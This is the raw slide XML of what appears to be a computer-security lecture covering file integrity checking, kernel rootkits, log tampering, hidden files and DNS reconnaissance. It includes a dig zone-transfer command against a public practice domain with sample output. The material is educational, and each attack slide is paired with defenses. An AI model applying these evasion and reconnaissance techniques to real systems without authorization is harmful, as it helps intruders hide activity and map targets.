          <p:cNvPr id="864" name="Google Shape;864;p84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Don’t let attackers gain root access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integrity checking of files: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Carry a floppy with </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2400"/>
              <a:t>md5sum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>, check hashes of system files against hashes advertised on vendor site or hashes you stored before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Tripwire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Free integrity checker that saves md5 sums of all important files in a secure database (read only CD), then verifies them periodically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lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000099"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.tripwire.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="10159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000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kernel Rootkits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="871" name="Google Shape;871;p85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Replace system calls</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-4191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GB" sz="1800"/>
              <a:t>Intercept calls to open one application with calls to open another, of attacker’s choosing</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-4191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GB" sz="1800"/>
              <a:t>Now even checksums don’t help as attacker did not modify any system applications</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-4191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GB" sz="1800"/>
              <a:t>You won’t even see attacker’s files in file listing</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-4191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GB" sz="1800"/>
              <a:t>You won’t see some processes or open ports</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-4699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Usually installed as kernel modules</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-4699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Defenses: disable kernel modules </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="0" marL="631825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EX: change command “ls” to hide the malware.exe file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ls issues a reads sys call. The attacker can create another kernel module that has the equivalent of the statement “if(fname == “malware.exe”) skip”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Make the syscall table point to attacker’s kernel module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Hashing won’t help anymore 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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="8043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Altering Logs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="878" name="Google Shape;878;p86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For binary logs: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Stop logging services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Load files into memory, change them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Restart logging service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Or use special tool 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For text logs simply change file through scripts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Change login and event logs, command history file, last login data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-3048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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="8043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Defenses Against Altering Logs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="885" name="Google Shape;885;p87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Use separate log servers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Machines will send their log messages to these servers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Encrypt log files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Make log files append only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Save logs on write-once media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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="5926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Creating Hard-to-Spot Files</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="892" name="Google Shape;892;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048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Names could look like system file names, but slightly changed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Start with .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Start with . and add spaces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Make files hidden</a:t>
            </a:r>
            <a:endParaRPr/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Defenses: intrusion detection systems and caution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096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Domain Name System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81000" y="1447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What does DNS do? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="9900FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Retrieves IP given name</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="9900FF"/>
              </a:solidFill>
            </a:endParaRPr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How does DNS work? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="9900FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Works like a phone book</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="9900FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-5334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Types of information an attacker can gather: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Range of addresses used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Address of a mail server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Address of a web server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OS information</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="1" marL="9794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Comments</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-3556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09600" y="46735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Interrogating DNS – Zone Transfer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81000" y="1020678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6318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99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Originally a service to enable a primary DNS server to transfer all its knowledge to a secondary server</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="0" marL="6318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If allowed to be used by external clients, it can leak sensitive information</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-5334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5334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5334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$ dig axfr example.com @ns1.example.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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>
              <a:solidFill>
                <a:srgbClr val="9900FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-5334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$ dig axfr zonetransfer.me @nsztm2.digi.ninja </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-5207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Which DNS servers does this domain have? Defined by NS</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-5207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Which mail servers does this domain have? Defined by MX</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="9900FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-5207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Are there any Web servers? What is their IP? Defined by A/AAAA</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-5207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Can you find names and phones of people in this organization?</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-5207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What other servers can you see in the listing?</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-533400" lvl="0" marL="6318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2285999" y="-12129106"/>
            <a:ext cx="9821333" cy="286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7200	IN	SOA	nsztm1.digi.ninja. robin.digi.ninja. 2017103001 172800 900 1209600 3600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300	IN	HINFO	"Casio fx-700G" "Windows XP"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301	IN	TXT	"google-site-verification=tyP28J7JAUHA9fw2sHXMgcCC0I6XBmmoVi04VlMewxA"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7200	IN	MX	0 ASPMX.L.GOOGLE.COM.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7200	IN	MX	10 ALT1.ASPMX.L.GOOGLE.COM.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7200	IN	MX	10 ALT2.ASPMX.L.GOOGLE.COM.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7200	IN	MX	20 ASPMX2.GOOGLEMAIL.COM.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zonetransfer.me.	7200	IN	MX	20 ASPMX3.GOOGLEMAIL.COM.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943" y="3429000"/>
            <a:ext cx="2336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